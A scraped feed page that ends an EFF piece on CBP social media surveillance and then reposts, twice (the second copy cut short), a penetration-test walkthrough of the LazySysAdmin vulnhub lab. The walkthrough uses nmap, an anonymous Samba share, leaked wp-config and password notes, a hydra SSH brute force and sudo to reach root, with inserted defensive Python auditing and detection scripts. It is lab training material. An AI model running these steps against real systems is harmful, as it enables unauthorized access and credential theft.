This concern is backed by past practices where DHS agencies used fake profiles and interacted with users during the course of monitoring their social media activity. Earlier this year, journalists revealed that U.S. Immigration and Customs Enforcement (ICE) officers created fake Facebook and LinkedIn profiles to lend legitimacy to a sham university intended to identify individuals allegedly engaged in immigration fraud. There, ICE officers friended other users and exchanged emails with students, thereby potentially bypassing social media privacy settings and gaining access to information intended to remain private.
Such practices not only violate DHS’ existing policies, but also allow law enforcement to obtain access to content that would otherwise require a probable cause warrant. Furthermore, fake profiles violate the policies of several social media platforms. Facebook has publicly stated that law enforcement impersonator profiles violate the company’s terms of service. 
Fighting Back
The CBP PIA is just one sliver of a broad federal government campaign to engage in social media surveillance. DHS, through its National Operations Center, has been monitoring social media for “situational awareness” since at least 2010. DHS also has been monitoring social media for intelligence gathering purposes. More recently, DHS and the State Department have greatly expanded social media surveillance to vet visitors and immigrants to the U.S., which EFF and other civil society groups have consistently opposed.
Several congressional committees have the responsibility and the opportunity to review CBP’s budget and provide oversight of the agency’s operations, including its social media surveillance.  At a minimum, EFF urges these committees to ensure that CBP is following DHS’ own policies and is reporting, both to Congress and the public, how often officers are engaging in social media monitoring to understand the prevalence and scale of this program. Fundamentally, Congress should be asking why social media surveillance programs are necessary for public safety. Additionally, Congress has the responsibility to ensure that CBP and DHS are abiding by settled case law respecting the free speech and privacy rights of Americans and foreign travelers.
We’re also pushing social media companies to do more when they identify law enforcement impersonator profiles at the local, state, and federal level. Earlier this year, Facebook’s legal staff demanded that the Memphis Police Department “cease all activities on Facebook that involve the use of fake accounts or impersonation of others.” Additionally, Facebook updated its “Information for Law Enforcement Authorities” page to highlight how its misrepresentation policy also applies to police. While EFF applauds these steps, we are skeptical that warnings or policy changes alone will deter the activity. Facebook says it will delete accounts brought to its attention, but too often these accounts only become publicly known—through a lawsuit or a media report—long after the damage has been done. Instead, EFF is calling on Facebook to take specific steps to provide transparency into these law enforcement impersonator accounts by notifying users who have interacted with these accounts, following the Santa Clara Principles when removing the law enforcement accounts, and adding notifications to agencies’ Facebook pages to inform the public when the agencies’ policies permit impersonator accounts in violation of Facebook’s policy.
Please contact your members of Congress and urge them to hold CBP accountable. Congress depends on hearing from their constituents to know where to focus, and public pressure can ensure that social media surveillance won’t get overlooked.
from Deeplinks https://ift.tt/2ZzthFq
iyarpage · 7 years
Penetration Test Training – LazySysAdmin: 1 (vanilla style)
and Kai Herings
Good morning everyone…
Today we’re going to start our training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1. To use this image, just download and unzip it, then import it into a running VirtualBox. Be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP address via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so adapt this to your networking. We are also working on macOS 10.3, so be sure to adapt the tools used to your environment. We used the following tools:
netdiscover
nmap
dirb
THC hydra
If you want to install these tools with Homebrew, just tap the feffi/homebrew-pentest repository:
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
 Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
 _________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor
 -----------------------------------------------------------------
 192.168.60.2    08:00:27:6d:95:4e     1       60   Unknown vendor
Ah, right, 192.168.60.2, that's fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2"
$ echo $ip
Nice, let’s run a standard service scan with version detection and default scripts:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for 192.168.60.2
Host is up (1.0s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.60.1
|_  error: Closing link: (nmap@192.168.60.1) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28
Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the guest account is accepted at user authentication level, which is nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt
Let’s chat…
Having a look at the IRC daemon …
$ telnet 192.168.60.2 6667
Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname...
>>PASS none
:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead.
>>NICK Bla
>>USER blah blah blah blah
:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected]
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1
Checking for known weaknesses in InspIRCd-2.0 … only DoS and spoofing issues, no remote access known. Let’s move on to the next service.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for 192.168.60.2
Host is up (0.00054s latency).
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.60.2\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.60.2\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|     Current user access:
|   \\192.168.60.2\share$:
|     Type: STYPE_DISKTREE
|     Comment: Sumshare
|     Users: 0
|     Max Users:
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
Oh, nice! A guest-writable share, and its path is the web root. Maybe we can snoop around…
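The smb-enum-shares output above is exactly what a defender should be looking for in scans of their own hosts: a share with anonymous READ/WRITE access whose path is the web document root. As an added example (not code from the original codecentric post), here is a small Python audit that parses that script output and ranks the shares by the risk their anonymous-access level implies. The sample output is constructed to mirror the scan above, and the list of web-root path hints is my own assumption.

```python
import re

# Constructed sample of nmap's smb-enum-shares script output, modelled on the
# scan above (same share names and paths; not captured from a live host).
SAMPLE_NMAP_OUTPUT = r"""
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.60.2\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.60.2\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|     Current user access:
|   \\192.168.60.2\share$:
|     Type: STYPE_DISKTREE
|     Comment: Sumshare
|     Users: 0
|     Max Users:
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

# "\\host\share:" header line that opens one share block.
SHARE_RE = re.compile(r'^\|\s+\\\\([^\\]+)\\([^:]+):\s*$')
# "Key: value" line inside a share block (the last one is prefixed "|_").
FIELD_RE = re.compile(r'^\|_?\s+([A-Za-z ]+?):\s*(.*)$')

# Path fragments that identify a web document root (assumed list, lowercase).
WEB_ROOT_HINTS = ('\\var\\www', '/var/www', 'htdocs', 'wwwroot')
SEVERITY_ORDER = ('CRITICAL', 'HIGH', 'MEDIUM')


def parse_smb_enum_shares(text):
    """Return {share_name: {field: value, ...}} from smb-enum-shares output."""
    shares = {}
    current = None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(2)
            shares[current] = {'host': m.group(1)}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            shares[current][m.group(1).strip()] = m.group(2).strip()
    return shares


def audit_shares(shares):
    """Rank shares by what an anonymous (guest) user is allowed to do."""
    findings = []
    for name, info in shares.items():
        anon = info.get('Anonymous access', '')
        path = info.get('Path', '')
        if not anon:
            continue  # anonymous users get nothing here: fine
        if info.get('Type') == 'STYPE_IPC_HIDDEN':
            # IPC$ open to anonymous means null sessions, i.e. free enumeration.
            findings.append(('MEDIUM', name, path, 'null session (anonymous IPC$) permitted'))
        elif 'WRITE' in anon:
            severity, reason = 'HIGH', 'anonymous write access'
            if any(hint in path.lower() for hint in WEB_ROOT_HINTS):
                severity = 'CRITICAL'
                reason += ' to the web document root (anyone can drop files the web server will serve)'
            findings.append((severity, name, path, reason))
        else:
            findings.append(('MEDIUM', name, path, 'anonymous read access'))
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f[0]))


if __name__ == '__main__':
    for severity, name, path, reason in audit_shares(parse_smb_enum_shares(SAMPLE_NMAP_OUTPUT)):
        print(f'[{severity:8}] {name:<8} {path:<28} {reason}')
```

Run against the sample, it reports share$ as CRITICAL and the anonymous IPC$ as MEDIUM, while print$ (no anonymous access) is silent; the same parser can be pointed at the saved output of `nmap --script=smb-enum-shares` from a scheduled scan of your own subnet.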
$ mkdir share
$ mount_smbfs //guest:@192.168.60.2/share$ share
$ cd share
$ tree -L 2 .
.
├── Backnode_files
│   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp
Really? A WordPress installation! Let’s check this first.
$ grep DB_USER wordpress/wp-config.php
define('DB_USER', 'Admin');
$ grep DB_PASSWORD wordpress/wp-config.php
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ grep DB_NAME wordpress/wp-config.php
define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we have collected some material here, but where can we use it?
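The todo note says it all: the box shipped with a config file and a password note sitting in a guest-readable share. Before a server goes out, the share should be audited for exactly this. As an added example, not code from the original post, the Python below walks a share tree and reports files whose names or contents look like credentials, masking the values so the report itself does not become a second leak. The sample tree is constructed here to resemble the layout above; the file names match the page, the secret values are placeholders, and the name and pattern lists are my own assumptions.

```python
import os
import re
import tempfile

# File names that should never sit on a guest-readable share (assumed list).
SENSITIVE_NAMES = {'wp-config.php', '.env', '.htpasswd', 'id_rsa', '.bash_history'}
SENSITIVE_SUFFIXES = ('.bak', '.old', '.sql', '.orig')

# Content patterns whose first group captures the secret value.
CREDENTIAL_PATTERNS = (
    # define('DB_PASSWORD', '...') as found in wp-config.php
    re.compile(r"define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'", re.IGNORECASE),
    # free-text "Password 12345" / "password: x" / "password=x"
    re.compile(r"\bpassword\b\s*[:=]?\s*(\S+)", re.IGNORECASE),
)


def mask(secret):
    """Keep only the first character so the report does not repeat the secret."""
    return secret[:1] + '*' * max(len(secret) - 1, 3)


def audit_share_tree(root):
    """Walk `root`; return (relative_path, reason) pairs for risky files."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            if name in SENSITIVE_NAMES or name.endswith(SENSITIVE_SUFFIXES):
                findings.append((rel, 'sensitive file name exposed on share'))
            try:
                with open(full, encoding='utf-8', errors='replace') as fh:
                    for lineno, line in enumerate(fh, 1):
                        for pattern in CREDENTIAL_PATTERNS:
                            m = pattern.search(line)
                            if m:
                                findings.append((rel, f'credential-like content, line {lineno}: {mask(m.group(1))}'))
                                break  # one finding per line is enough
            except OSError:
                continue  # unreadable file: nothing to scan
    return findings


def build_sample_share():
    """Create a constructed copy of the share layout above with placeholder secrets."""
    root = tempfile.mkdtemp(prefix='share_audit_')
    os.makedirs(os.path.join(root, 'wordpress'))
    files = {
        'wordpress/wp-config.php': "<?php\ndefine('DB_NAME', 'wordpress');\n"
                                   "define('DB_USER', 'Admin');\n"
                                   "define('DB_PASSWORD', 'placeholder-db-secret');\n",
        'deets.txt': "CBF Remembering all these passwords.\n\nPassword placeholder123\n",
        'todolist.txt': "Prevent users from being able to view the web root using the local file browser\n",
        'index.html': "<html><body>Backnode</body></html>\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, *rel.split('/')), 'w', encoding='utf-8') as fh:
            fh.write(content)
    return root


if __name__ == '__main__':
    for rel, reason in audit_share_tree(build_sample_share()):
        print(f'{rel}: {reason}')
```

On the sample tree the audit flags wp-config.php twice (by name and by its DB_PASSWORD line) and deets.txt once (the free-text password), and stays quiet on index.html and todolist.txt; the word "passwords" in the first line of deets.txt does not trip the pattern because of the word boundary. Point `audit_share_tree` at the mount point of your own share to get the same report.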
Land of the Apache
Maybe we should enumerate a little further. We have a website listening on port 80. Let’s brute-force its directory names with dirb:
$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov  4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://ift.tt/2hvafiO
+ http://ift.tt/2jlanBV (CODE:200|SIZE:36072)
+ http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236)
==> DIRECTORY: http://ift.tt/2jlao8X
==> DIRECTORY: http://ift.tt/2hyB3OZ
==> DIRECTORY: http://ift.tt/2jnXDu5
+ http://ift.tt/2htorZo (CODE:200|SIZE:92)
+ http://ift.tt/2jkJEoX (CODE:403|SIZE:292)
==> DIRECTORY: http://ift.tt/2hwIiXI
==> DIRECTORY: http://ift.tt/2jlv7cQ
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)
Ok, while dirb is still running we already have some interesting directories to look at:
http://ift.tt/2hvafiO
http://ift.tt/2hw2XeJ
http://ift.tt/2jnXDu5
http://ift.tt/2jlv7cQ
And some more. We’ve already seen those in the Samba enumeration. Let’s try the WordPress site then…
$ curl -v http://ift.tt/2jlv7cQ
...   My name is togie. My name is togie. My name is togie. My name is togie. ...
Hmm, that togie again… maybe we can try SSH…
Serpentine water monster
Let’s try our already filled login list, using it both as username and as password list:
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active
[22][ssh] host: 192.168.60.2   login: togie   password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42
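A run like this (169 tries in just over a minute from one source address) leaves a very recognisable trace in the target's auth.log. As an added example, not taken from the original post, the Python below implements the detection side: a per-source sliding window over sshd "Failed password" events that raises an alert when the window fills and escalates when a login succeeds right after a burst of failures. The log lines are constructed to match the format of sshd syslog output on Ubuntu 14.04 (hostname and IPs borrowed from the walkthrough, not captured); the 60-second window and the threshold of 5 are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt in Ubuntu 14.04 sshd/syslog format, shaped like
# the brute-force run above: several users tried, then a success, then an
# unrelated user with a single typo followed by a key-based login.
SAMPLE_AUTH_LOG = """\
Nov  4 20:35:24 LazySysAdmin sshd[2310]: Failed password for invalid user TR2 from 192.168.60.1 port 50210 ssh2
Nov  4 20:35:24 LazySysAdmin sshd[2311]: Failed password for invalid user guest from 192.168.60.1 port 50212 ssh2
Nov  4 20:35:25 LazySysAdmin sshd[2312]: Failed password for invalid user LAZYSYSADMIN from 192.168.60.1 port 50214 ssh2
Nov  4 20:35:25 LazySysAdmin sshd[2313]: Failed password for togie from 192.168.60.1 port 50216 ssh2
Nov  4 20:35:26 LazySysAdmin sshd[2314]: Failed password for togie from 192.168.60.1 port 50218 ssh2
Nov  4 20:35:26 LazySysAdmin sshd[2315]: Failed password for togie from 192.168.60.1 port 50220 ssh2
Nov  4 20:35:27 LazySysAdmin sshd[2316]: Accepted password for togie from 192.168.60.1 port 50222 ssh2
Nov  4 20:40:01 LazySysAdmin sshd[2400]: Failed password for alice from 10.0.0.5 port 41000 ssh2
Nov  4 20:41:10 LazySysAdmin sshd[2401]: Accepted publickey for alice from 10.0.0.5 port 41002 ssh2
"""

LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>[\d.]+) port \d+'
)

WINDOW_SECONDS = 60   # assumed: failures older than this drop out of the window
THRESHOLD = 5         # assumed: failures within the window that trigger an alert


def parse_ts(raw):
    # syslog timestamps carry no year; only differences between them matter here.
    return datetime.strptime(' '.join(raw.split()), '%b %d %H:%M:%S')


def detect_ssh_bruteforce(log_text, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return (severity, source_ip, message) alerts for sshd brute-force patterns."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    users = defaultdict(set)        # ip -> distinct usernames tried
    already_alerted = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip = parse_ts(m['ts']), m['ip']
        recent = failures[ip]
        while recent and (ts - recent[0]).total_seconds() > window:
            recent.popleft()  # expire failures outside the window
        if m['result'] == 'Failed':
            recent.append(ts)
            users[ip].add(m['user'])
            if len(recent) >= threshold and ip not in already_alerted:
                alerts.append(('HIGH', ip,
                               f'{len(recent)} failed logins within {window}s against {len(users[ip])} user(s)'))
                already_alerted.add(ip)
        elif len(recent) >= threshold:
            # A success right after a burst of failures is the signature of a guessed password.
            alerts.append(('CRITICAL', ip,
                           f"successful {m['method']} login for {m['user']} after {len(recent)} recent failures"))
    return alerts


if __name__ == '__main__':
    for severity, ip, message in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(f'[{severity}] {ip}: {message}')
```

On the sample the detector raises one HIGH alert for 192.168.60.1 when the fifth failure lands and one CRITICAL alert when the password login for togie succeeds right after, while alice's single typo followed by a key login 69 seconds later stays below the threshold. The same function can be fed `tail -f /var/log/auth.log` output line by line; in practice the follow-up is a lockout rule (fail2ban or sshd `MaxAuthTries`) and, above all, not shipping a user named on the web page with a password from a text file on the share.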
Nice! So we log in as togie with password 12345:
$ ssh togie@$ip
##################################################################################################
#                                   Welcome to Web_TR1                                           #
#                          All connections are monitored and recorded                            #
#                 Disconnect IMMEDIATELY if you are not an authorized user!                      #
##################################################################################################
togie@192.168.60.2's password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  http://ift.tt/ABdZxn

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0: 192.168.60.2
  Swap usage:   0%

  Graph this data and manage this system at:
    http://ift.tt/XlAX5B

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We are in the sudo group…
Flag
$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)

Hope you learn't a few things along the way.

Regards,
Togie Mcdogie

Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.
Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2fA8nUr
mobilenamic · 7 years
Text
Penetration Test Training – LazySysAdmin: 1 (vanilla style)
and Kai Herings
Good morning everyone…
Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1. To use this image, just download, unzip and throw it against a running virtualbox. Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking. We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:
netdiscover
nmap
dirb
THC hydra
If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1 _________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------- 192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor
Ah, right, 192.168.60.2, thats fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2" $ echo $ip
Nice, let’s start a common scanning for services:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET Nmap scan report for 192.168.60.2 Host is up (1.0s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.60.1 |_ error: Closing link: ([email protected]) [Client exited] Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2017-11-05T00:22:19+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2017-11-04 15:22:19 |_ start_date: 1601-01-01 00:53:28
Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that ist nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt $ echo "guest" >> login.txt $ echo "LAZYSYSADMIN" >> login.txt $ echo "lazysysadmin" >> login.txt $ echo "x00" >> login.txt
Let’s chat…
Having a look a the irc deamon …
